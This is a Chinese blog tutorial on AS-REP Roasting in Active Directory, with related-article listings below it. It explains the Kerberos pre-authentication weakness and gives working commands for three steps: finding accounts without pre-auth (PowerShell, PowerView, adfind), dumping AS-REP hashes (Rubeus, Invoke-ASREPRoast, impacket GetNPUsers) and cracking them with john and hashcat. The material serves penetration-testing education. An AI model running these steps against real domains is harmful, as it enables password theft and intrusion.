Roasting攻击

最新推荐文章于 2024-07-27 16:06:00 发布
最新推荐文章于 2024-07-27 16:06:00 发布
阅读量943 收藏 8
点赞数 23
分类专栏: 内网篇 文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y22Lee/article/details/139397332
版权

一. AS-REP Roasting攻击原理

AS-REP Roasting是一种对用户账号进行离线爆破的攻击方式,他是因为管理员的错误配置导致的,该攻击是AS-REP数据包导致的,因为管理员在域控上勾选了【不要求Kerberos】预身份验证
在这里插入图片描述
AS-REP(AS-Response):当KDC收到AS-REQ之后解密PA-DATA pA-ENC-TIMESTAMP 如果成功就返回AS- REP

第一个enc-part: TGT中由KRBTGT哈希值加密部分
第二个enc-part:TGT中由用户哈希值加密部分

在这里插入图片描述
接下来分析一下勾选和没勾选情况的流量

没有勾选
使用kekeo工具抓包分析,在正常的请求,我们输入正确的账号密码才有AS-REP数据包,并且其中包含了两部分
AS-REQ
在这里插入图片描述
AS-REP
在这里插入图片描述
勾选
打钩之后看一下数据包,我们不需要提供密码,只需要提供账号,AS就会返回TGT还有加密的session key,因此我们破解该字段内容就可以得到用户的密码
AS-REQ
在这里插入图片描述
AS-REP
在这里插入图片描述

二. 获取勾选预定认证用户列表

想要使用此方法破解域用户的密码,首先这个用户必须勾选的(不要求Kerberos预身份验证)才可以,所以我们第一步就是获取域内哪些用户勾选个这个选项。

获取勾选预认证用户与密码喷洒一样,工作组和域内主机都可以。

1. 域内主机

方法一
在域控上执行此命令(必须是域控):

Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name

在这里插入图片描述

方法二
在域内主机上使用PowerView.ps1脚本:

Import-Module .\PowerView.ps1
Get-DomainUser -PreauthNotRequired –Verbose(列出详细信息)
Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose

在这里插入图片描述

2. 工作组

方法一
此方法只能是在你知道域用户和密码时才能使用LDAP进行查询,使用Adind工具

adind -h 192.168.41.10:389 -u abc\test1 -up LYp010822 –f "useraccountcontrol:1.2.840.113556.1.4.803:=4" -dn

在这里插入图片描述
方法二
自己魔改的工具,之前的工具都是通过查询用户属性,根据之前的喷洒工具,我们修改里面的规则,根据协议找出来用户(改过后的工具可以查询不需要提供域用户的密码就可以啦直接使用kerberos协议即可)
在这里插入图片描述

三. 获取AS-REQ的ENC-PART

对于域内的主机,我们如果想要知道,该用户的part的值可以使用相关的工具,基本上都是使用LDAP协议查询用户,然后列出相关的part值

1.域内

Rubesu
Rubesu 是由国外安全研究院harmj0y用C#编写的针对Kerberos协议进行攻击的工具,可以发起Kerberos请求,并将请求票据导入内存中,Rebeus提供了大量的用于Kerberos攻击的功能,比如TGT请求/ST请求/AS-REP Roasting攻击/Kerberoasting攻击/委派攻击/黄金票据/白银票据等

Rubesu工具需要 3.5支持,否则会运行不了有如下的提示
在这里插入图片描述

运行命令:

Rubeus.exe asreproast /format:john /outfile:用户字典

ASREPRoast脚本

Import-Module .\ASREPRoast.ps1
Invoke-ASREPRoast | select -ExpandProperty Hash

在这里插入图片描述

2. 非域用户

方法一
使用用户字典一个一个去试试
枚举的方式:

impacket-GetNPUsers -dc-ip 192.168.41.10 -usersfile 1.txt -format john hack.com/

在这里插入图片描述
方法二
特定字典-指定用户的方式:

GetNPUsers.exe -dc-ip 192.168.41.10 hack.com/test1 -no-pass

在这里插入图片描述

四. 暴力破解用户Hash密码

拿到part值之后因为该值使用NTLM-HASH值进行加密的,所以可以进行暴力破解
这里介绍2个工具

1、john

将密码字典和获取的part值文件导入工具目录下
命令:

john --wordlist=密码字典 part值

在这里插入图片描述

2、hashcat

命令

hashcat -m 18200 hash.txt 密码字典 --force

Hashcat命令格式:

https://hashcat.net/wiki/doku.php?id=example_hashes

我们直接生成的part值中和手册中的值不符合因为少了$23,需要自己手动改一下
在这里插入图片描述

在这里插入图片描述
出现该种情况可以参考这篇文章
https://blog.csdn.net/maxiluo/article/details/132689828

Y22Lee
关注
专栏目录
AS-REP Roasting攻击
谢公子的博客
03-29 2386
首先,关闭hack2用户的 Kerberos预身份验证。 然后使用 Rubeus执行如下命令 Rubeus.exe asreproast 然后使用hashcat进行爆破
内网渗透(六十)之AS-REP Roasting攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-30 1336
AS-REP Roasting是一种针对用户账户进行离线爆破的攻击方式。但是该攻击方式使用上比较受限,因为其需要用户账户设置“不要求Kerberos预身份验证”选项。而该选项默认是没有勾选的。Kerberos域身份验证发生在Kerberos身份验证的第一阶段(AS_REQ&AS_REP),它的主要作用就是防止密码离线爆破。默认情况下,预身份验证是开启的,KDC会记录密码错误的次数,防止在线爆破。
内网安全--AS-REP Roasting攻击
weixin_45910629的博客
04-10 653
AS-REP Roasting是一种对用户账号进行离线爆破的攻击方式。但是该攻击方式利用比较局限,因为其需要用户账户设置“不要求Kerberos预身份验证”选项,而该选项是默认没有勾选上的。Kerberos预身份验证发送在Kerberos身份验证的第一阶段(AS_REQ&AS-REP),它的主要作用是防止密码离线爆破。默认情况下,预身份验证是开启的,KDC会记录密码错误次数,防止在线爆破。
域内攻击手法——AS-REP Roasting攻击和Kerberoasting攻击
最新发布
Naive的博客
07-27 952
AS-REP Roasting是一种对用户账户进行离线爆破的攻击方式。但是该攻击方式使用上比较受限,因为其需要用户账户设置不要求Kerberos 预身份验证选项。Kerberoasting 攻击是在 TGS_REP 的过程中用户将会收到由目标服务实例的 NTLM hash 加密生成的 ST(service ticket),如果获得这个 ST 票据,由于该 ST 是用服务 Hash 进行加密的,因此客户端在拿到该 ST 后可以用于本地离线爆破。
KERBEROS 身份验证协议
xman_78tom的专栏
11-01 2117
 简介KERBEROS 协议是用于域环境下的身份验证协议(被 Windows 2000 及以后的系统支持),但当域成员需要访问工作组模式下的服务,或当不能使用 KERBEROS 协议(例如,在域环境下域成员使用 IP 地址而非主机名访问共享资源,或域成员无法联系域控制器),NTLM 协议将被使用(当同时使用 LM 和 NTLM
域渗透 | kerberos认证及过程中产生的攻击
st3pby的博客
02-20 7091
Windows认证一般包括本地认证(NTLM HASH)和域认证(kerberos)。认证的原理网上有很多文章。如果喜欢听视频课程的话,这里推荐倾旋师傅的分享课本篇文章主要内容是Kerberos认证过程中产生的攻击。Kerberos是由麻省理工学院提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。Kerberos协议有两个基础认证模块:和,以及微软扩展的两个认证模块S4U和PAC。kerberos是一种基于票据的认证方式。
红队技巧-域渗透的协议利用
qq_50854662的博客
03-27 1799
1.pth(hash传递) 1.1 PTH简介 哈希传递(pth)攻击是指攻击者可以通过捕获密码的hash值(对应着密码的值),然后简单地将其传递来进行身份验证,以此来横向访问其他网络系统,攻击者无须通过解密hash值来获取明文密码,因为对于每个Session hash值都是固定的,除非密码被修改了(需要刷新缓存才能生效),所以pth可以利用身份验证协议来进行攻击攻击者通常通过抓取系统的活动内存和其他技术来获取哈希。 1.2 PTH限制 在03之后有了ua...
域渗透-AS-REP Roasting攻击
内心不种满鲜花就会长满杂草
03-25 1570
AS-REP Roasting攻击是一种针对域用户账号hash进行离线爆破的攻击方式,它利用了Kerberos协议中的特定漏洞。
某亭红队面试.pdf
07-02
在本文中,我们还讨论了域内攻击方法,包括 MS14-068、Roasting 攻击、离线爆破密码、委派攻击、非约束性委派、基于资源的约束委派、ntlm relay 等知识点这些知识点都是攻击 Java_web 程序中常见的攻击方式。...
域渗透完全技巧.pdf
10-03
在没有密码的情况下,可能会使用密码喷洒或ASREP Roasting攻击来获取哈希值。 5. **权限维持**:一旦获取了域控权限,攻击者会部署后门,如利用域信任关系、SID历史、AdminSDHolder和SDProp、Dcsync后门等。他们还...
基于Kerberos的身份认证机制研究
10-29
基于Kerberos的身份认证机制研究
kerberos入坑指南
mark's technic world
03-14 1608
原理介绍 kerberos主要是用来做网络通信时候的身份认证,最主要的特点就是“复杂”。所以在入坑kerberos之前,最好先熟悉一下其原理。这里推荐一些别人写的文章内容来进行简单汇总: 链接kerberos认证原理用对话场景来解释kerbeors的设计过程 简图 kerberos认证流程简图 几个概念的补充 principal 认证的主体,简单来说就...
JSch登录sftp,跳过 Kerberos username 身份验证提示
虾哔哔的博客
09-04 1542
一般情况下,我们登录sftp服务器,用户名认证或者密钥认证即可。 但是如果对方服务器设置了Kerberos 身份验证,而已方又没有对应的配置时,则会提示输入 Kerberos username [xxx] Kerberos password 此时,简单的解决办法是,可以去掉Kerberos 身份验证来解决 解决办法 session.setConfig(“PreferredAut...
【转】谈谈基于Kerberos的Windows Network Authentication
cheran的专栏
12-13 1115
http://www.cnblogs.com/artech/archive/2007/07/07/809545.html Content: 基本原理 引入Key Distribution: KServer-Client从何而来 引入Authenticator : 为有效的证明自己提供证据 引入Ticket Granting  Service:如何获得Ticket Kerbe
Kerberos身份认证在域用户工作站登录中的应用
weixin_33860147的博客
10-25 257
以下内容摘自由笔者编写,并将在明年初出版的《网络工程师必读——网络安全系统设计》一书中(书名可能会更改)。   6.7.3 Kerberos身份认证在域用户工作站登录中的应用   假设用户在tailspintoys.com域中有自己的网络账户。用户自己的工作站也属于tailspintoys.com域。用户通过按下【CTRL】+【ALT】+【DEL】组合键登录界面登录域网络(这是在计算机上使...
Kerberos身份验证流程
pengjunlee的博客
05-21 2747
介绍: Kerberos 是一种由 MIT(麻省理工大学)提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。 在 Kerberos 认证中,最主要的问题是如何证明「你是你」的问题,如当一个 Client 去访问 Server 服务器上的某服务时,Server 如何判断 Client 是否有权限来访问自己主机上的服务,同时保证在这个过程中的通讯内容即使被拦截或篡改也不影响通讯的安全性,这正是 Kerberos 解决的问题。在域渗透过程中 Kerberos 协议的
基于MS客户端的单点登陆
永远のZM专栏
03-31 1143
Microsoft 客户端单一登录概述 通过使用 Microsoft 客户端进行单一登录 (SSO),可以在 WebLogic Server 域中运行的 Web 应用程序或 Web Service 与 Microsoft 域中的 .NET Web Service 客户端或浏览器客户端(例如,Internet Explorer)之间进行跨平台身份验证。Microsoft 客户端必须使用基于简单和
企业网络安全新挑战:身份认证协议攻防分析
攻击者通常会针对协议层进行滥用,例如Kerberos的攻击包括密码喷洒、AS-REP Roasting、Kerberoasting、MS14-068漏洞、黄金票据、青铜票据攻击等。NTLM(NT LAN Manager)协议也经常遭受PTH(Pass The Hash)、NTLM...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值